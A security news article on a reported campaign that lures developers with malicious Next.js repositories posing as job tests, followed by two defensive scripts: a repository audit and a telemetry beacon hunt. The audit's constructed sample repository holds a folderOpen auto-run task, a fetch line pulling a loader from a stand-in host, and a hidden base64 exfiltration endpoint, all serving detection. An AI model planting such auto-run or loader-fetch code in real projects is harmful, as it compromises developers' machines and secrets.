Microsoft has issued a stark warning to software developers regarding a sophisticated and coordinated attack campaign targeting them through malicious repositories masquerading as legitimate Next.js projects and technical assessment materials. Attackers are employing job-themed lures, presenting fake recruitment challenges to entice developers into cloning and executing potentially harmful code on their personal and corporate machines. This tactic, if successful, allows hackers to gain remote access to sensitive developer systems and the valuable data they contain.
The campaign came to light when security analysts observed suspicious outbound network connections from Node.js processes on affected developer machines, repeatedly reaching out to known command-and-control (C2) IP addresses. These network anomalies prompted a deeper investigation, correlating the network traffic with process telemetry. This analysis traced the execution back to malicious repositories, including one on Bitbucket presented as a recruiting technical assessment and another identified by the naming convention “Cryptan-Platform-MVP1.” Microsoft Defender Experts and their Security Research Team subsequently identified a larger collection of related repositories using shared code structures, loader logic, and naming patterns.
Microsoft Warns of Hackers Attacking Developers with Malicious Next.js Repositories
The observed repositories fall into several families, including “Cryptan,” “JP-soccer,” “RoyalJapan,” and “SettleMint,” often featuring near-duplicate variants labeled with common terms like v1, master, demo, platform, and server. This consistent structuring aided researchers in discovering additional repositories that, while not directly observed in initial telemetry, exhibited the same malicious execution logic and staging infrastructure. The sheer scale of this campaign poses a significant threat, particularly to development teams operating within corporate environments.
Developer machines are prime targets due to their privileged access to highly valuable assets such as source code, environment secrets, cloud API keys, database credentials, and critical build pipelines. When untrusted code is executed on such a machine, a single compromise can rapidly escalate, extending beyond the individual endpoint and potentially exposing an organization’s entire digital infrastructure. This method represents a calculated evolution in how threat actors approach software supply chain attacks, embedding malicious intent within seemingly legitimate development workflows.
Three Entry Points, One Shared Backdoor
Regardless of the initial entry point, all three execution paths identified in this campaign converge on a single outcome: the runtime retrieval and in-memory execution of attacker-controlled JavaScript. This shared backdoor is a key feature of the operation.
Visual Studio Code Workspace Automation Abuse
The first entry point abuses Visual Studio Code’s workspace automation. Once a developer opens a project folder and marks it as trusted, VS Code honours the folder’s `.vscode/tasks.json`; in these repositories that file carries a task whose `runOptions` is set to `"runOn": "folderOpen"`, so the task fires as soon as the folder is opened. The task launches a Node.js script that fetches a JavaScript loader from a Vercel-hosted staging endpoint, and that loader then opens communication with attacker-controlled infrastructure.
Development Server Execution
The second pathway is triggered when a developer starts the development server with `npm run dev`. Here the repository ships trojanized assets, such as a modified `jquery.min.js`, that decode a base64-encoded URL at runtime and fetch the same JavaScript loader from the Vercel staging endpoint, so the two vectors converge on identical infrastructure.
Backend Server Startup Exploitation
The third and final observed entry point runs during backend server startup. Here, malicious backend routes decode a base64-encoded endpoint hidden in the project’s `.env` file, post the entire process environment, including cloud API keys and access tokens, to that endpoint, and then compile and execute attacker-supplied JavaScript at runtime.
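The three indicators above (a `folderOpen` task, a base64 literal that decodes to a URL in a bundled asset, and a base64 endpoint in `.env`) can all be checked statically before a cloned repository is ever opened or run. The following script is an added example and is not code from Microsoft or from the malicious repositories; the file contents, the `example.invalid` hostnames and the `scripts/setup.js` path are constructed for illustration.

```javascript
// Added example, not code from Microsoft or from the malicious repositories:
// a pre-flight audit to run over a freshly cloned project BEFORE opening it in
// VS Code or running `npm run dev`. It looks for the three entry points
// described above. All file contents below are constructed samples.

// VS Code's tasks.json is JSONC; strip comments before JSON.parse.
function stripJsonComments(text) {
  return text.replace(/\/\*[\s\S]*?\*\//g, "").replace(/^\s*\/\/.*$/gm, "");
}

// Entry point 1: any task armed with runOptions.runOn === "folderOpen".
function findFolderOpenTasks(tasksJsonText) {
  let doc;
  try {
    doc = JSON.parse(stripJsonComments(tasksJsonText));
  } catch {
    return []; // unparsable file: VS Code could not auto-run it either
  }
  return (doc.tasks || [])
    .filter((t) => t.runOptions && t.runOptions.runOn === "folderOpen")
    .map((t) => ({
      label: t.label,
      command: [t.command, ...(t.args || [])].filter(Boolean).join(" "),
    }));
}

// Entry points 2 and 3: base64 literals that decode to an http(s) URL, the
// pattern used both in the trojanized jquery.min.js and in the .env endpoint.
const BASE64_RUN = /[A-Za-z0-9+/]{16,}={0,2}/g;
function findBase64Urls(text) {
  const hits = [];
  for (const run of text.match(BASE64_RUN) || []) {
    const decoded = Buffer.from(run, "base64").toString("utf8");
    if (/^https?:\/\/\S+$/.test(decoded)) hits.push({ encoded: run, decoded });
  }
  return hits;
}

// Walk a { path: contents } map (as a real tool would walk the checkout) and
// collect findings. tasks.json gets the task check; every file gets the
// base64 check, since a loader URL can hide in any asset or config file.
function auditRepo(files) {
  const findings = [];
  for (const [path, contents] of Object.entries(files)) {
    if (path.endsWith(".vscode/tasks.json")) {
      for (const t of findFolderOpenTasks(contents)) {
        findings.push({ path, kind: "folderOpen-task", detail: `${t.label}: ${t.command}` });
      }
    }
    for (const h of findBase64Urls(contents)) {
      findings.push({ path, kind: "base64-url", detail: `${h.encoded} -> ${h.decoded}` });
    }
  }
  return findings;
}

// Constructed sample repository; hostnames are hypothetical (.invalid TLD).
const LOADER_B64 = Buffer.from("https://example.invalid/loader.js").toString("base64");
const COLLECT_B64 = Buffer.from("https://example.invalid/collect").toString("base64");
const SAMPLE_REPO = {
  ".vscode/tasks.json": `{
  // constructed: task fires as soon as the trusted folder is opened
  "version": "2.0.0",
  "tasks": [{
    "label": "prepare",
    "type": "shell",
    "command": "node",
    "args": ["scripts/setup.js"],
    "runOptions": { "runOn": "folderOpen" }
  }]
}`,
  "public/jquery.min.js": `/* constructed: trojanized asset */ fetch(atob("${LOADER_B64}"));`,
  ".env": `DATABASE_URL=postgres://localhost/app\nAPI_ENDPOINT=${COLLECT_B64}\n`,
  "pages/index.js": "export default function Home() { return null; }",
};

if (typeof require !== "undefined" && require.main === module) {
  for (const f of auditRepo(SAMPLE_REPO)) console.log(`[${f.kind}] ${f.path}: ${f.detail}`);
}
```

Run against the constructed repository it reports the armed task, the loader URL inside `jquery.min.js` and the exfiltration endpoint in `.env`; a clean `pages/index.js` produces nothing. The base64 check is deliberately loose (any 16+ character run) because the decoded-URL test does the real filtering; a long run that decodes to bytes rather than an `http(s)://` string is ignored.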
Once any of these initial stages are successfully triggered, a lightweight Stage 1 payload takes over. This payload’s primary function is to profile the compromised host and then begin polling the C2 server at regular intervals. Following this, Stage 2 assumes control, enabling persistent operator-driven tasking. This includes functionalities such as directory browsing, the collection of sensitive files, and the staged uploading of exfiltrated data back to the attacker’s infrastructure.
To mitigate these threats, developers are strongly advised to keep Visual Studio Code’s Workspace Trust enabled and to open unfamiliar repositories in Restricted Mode, which prevents tasks and other workspace automation from running in untrusted folders. Organizations should implement attack surface reduction rules to block obfuscated script execution, enforce robust multi-factor authentication and conditional access policies for developer accounts, and strictly avoid storing production credentials on development machines. Security teams need to actively monitor for unusual Node.js outbound connections, using the DeviceNetworkEvents and DeviceProcessEvents tables in Defender advanced hunting queries, and conduct thorough identity risk triage whenever a developer endpoint compromise is suspected.
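The hunting step comes down to one correlation: a Node.js process, ideally tied back to its parent (VS Code for the task vector, a shell for `npm run dev`), that repeatedly reaches the same public address on a fixed interval, which is what the Stage 1 polling described above looks like in telemetry. The script below is an added example, not a Microsoft query; in production this would be a KQL advanced hunting query over the two tables, but the join and the beaconing test are the same. The records are constructed, the field names are assumed to mirror the advanced hunting schema, and the thresholds (three hits, 25% interval jitter) are illustrative choices.

```javascript
// Added example, not Microsoft's query: hunting for Node.js beaconing by
// joining process telemetry to network telemetry. Field names are assumed to
// follow the advanced hunting schema (DeviceProcessEvents / DeviceNetworkEvents)
// named above; every record below is constructed for illustration.

// RFC 1918 and loopback destinations are dropped: the dev server itself
// listens on localhost and would otherwise drown the signal.
function isPrivateOrLoopback(ip) {
  const [a, b] = ip.split(".").map(Number);
  return a === 10 || a === 127 || (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

// Coefficient of variation of the gaps between sorted timestamps. A value near
// 0 means a fixed polling interval, i.e. a loader checking in with C2.
function intervalJitter(timestampsMs) {
  const t = [...timestampsMs].sort((x, y) => x - y);
  const gaps = t.slice(1).map((v, i) => v - t[i]);
  const mean = gaps.reduce((s, g) => s + g, 0) / gaps.length;
  if (mean === 0) return 0;
  const variance = gaps.reduce((s, g) => s + (g - mean) ** 2, 0) / gaps.length;
  return Math.sqrt(variance) / mean;
}

// Group outbound connections by (device, node pid, remote endpoint), keep the
// groups that repeat at a steady cadence, and enrich each with the launching
// process's parent and command line from DeviceProcessEvents.
function huntNodeBeacons(processEvents, networkEvents, { minCount = 3, maxJitter = 0.25 } = {}) {
  const procIndex = new Map(processEvents.map((p) => [`${p.DeviceName}|${p.ProcessId}`, p]));
  const groups = new Map();
  for (const e of networkEvents) {
    if (!/^node(\.exe)?$/i.test(e.InitiatingProcessFileName)) continue;
    if (isPrivateOrLoopback(e.RemoteIP)) continue;
    const key = `${e.DeviceName}|${e.InitiatingProcessId}|${e.RemoteIP}:${e.RemotePort}`;
    if (!groups.has(key)) groups.set(key, []);
    groups.get(key).push(e);
  }
  const findings = [];
  for (const events of groups.values()) {
    if (events.length < minCount) continue;
    const jitter = intervalJitter(events.map((e) => Date.parse(e.Timestamp)));
    if (jitter > maxJitter) continue;
    const first = events[0];
    const proc = procIndex.get(`${first.DeviceName}|${first.InitiatingProcessId}`) || {};
    findings.push({
      device: first.DeviceName,
      pid: first.InitiatingProcessId,
      remote: `${first.RemoteIP}:${first.RemotePort}`,
      count: events.length,
      jitter,
      parent: proc.InitiatingProcessFileName, // e.g. Code.exe for the tasks.json vector
      commandLine: proc.ProcessCommandLine,
    });
  }
  return findings;
}

// Constructed telemetry. 203.0.113.0/24 is TEST-NET-3, not a real C2 address.
const PROCESS_EVENTS = [
  { DeviceName: "DEV-LAPTOP-01", ProcessId: 4242, FileName: "node.exe",
    ProcessCommandLine: "node scripts/setup.js", InitiatingProcessFileName: "Code.exe" },
  { DeviceName: "DEV-LAPTOP-01", ProcessId: 5151, FileName: "node.exe",
    ProcessCommandLine: "node node_modules/next/dist/bin/next dev", InitiatingProcessFileName: "cmd.exe" },
];
const T0 = Date.parse("2025-01-15T09:00:00Z");
const net = (offsetSec, file, pid, ip, port) => ({
  Timestamp: new Date(T0 + offsetSec * 1000).toISOString(), DeviceName: "DEV-LAPTOP-01",
  InitiatingProcessFileName: file, InitiatingProcessId: pid, RemoteIP: ip, RemotePort: port,
});
const NETWORK_EVENTS = [
  // pid 4242 (spawned by VS Code): 60-second check-ins to one public host -> beacon
  ...[0, 60, 120, 180, 240].map((s) => net(s, "node.exe", 4242, "203.0.113.7", 443)),
  // pid 5151 (npm run dev): loopback dev server plus a single external fetch -> benign
  net(5, "node.exe", 5151, "127.0.0.1", 3000),
  net(9, "node.exe", 5151, "203.0.113.8", 443),
  // a browser talking to the same host is out of scope for this hunt
  ...[0, 60, 120].map((s) => net(s, "chrome.exe", 777, "203.0.113.7", 443)),
];

if (typeof require !== "undefined" && require.main === module) {
  console.log(huntNodeBeacons(PROCESS_EVENTS, NETWORK_EVENTS));
}
```

Only the VS Code-spawned `node.exe` surfaces: five connections to the same endpoint with zero jitter, annotated with `Code.exe` as parent and `node scripts/setup.js` as command line, which is exactly the artefact an analyst needs to pivot from the network alert to the repository that was opened.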
Looking ahead, the focus will be on the continued evolution of these supply chain attack methods and the effectiveness of preventative measures deployed by both developers and organizations. Developers and security professionals will need to remain vigilant, adapting their defenses as attackers refine their techniques.

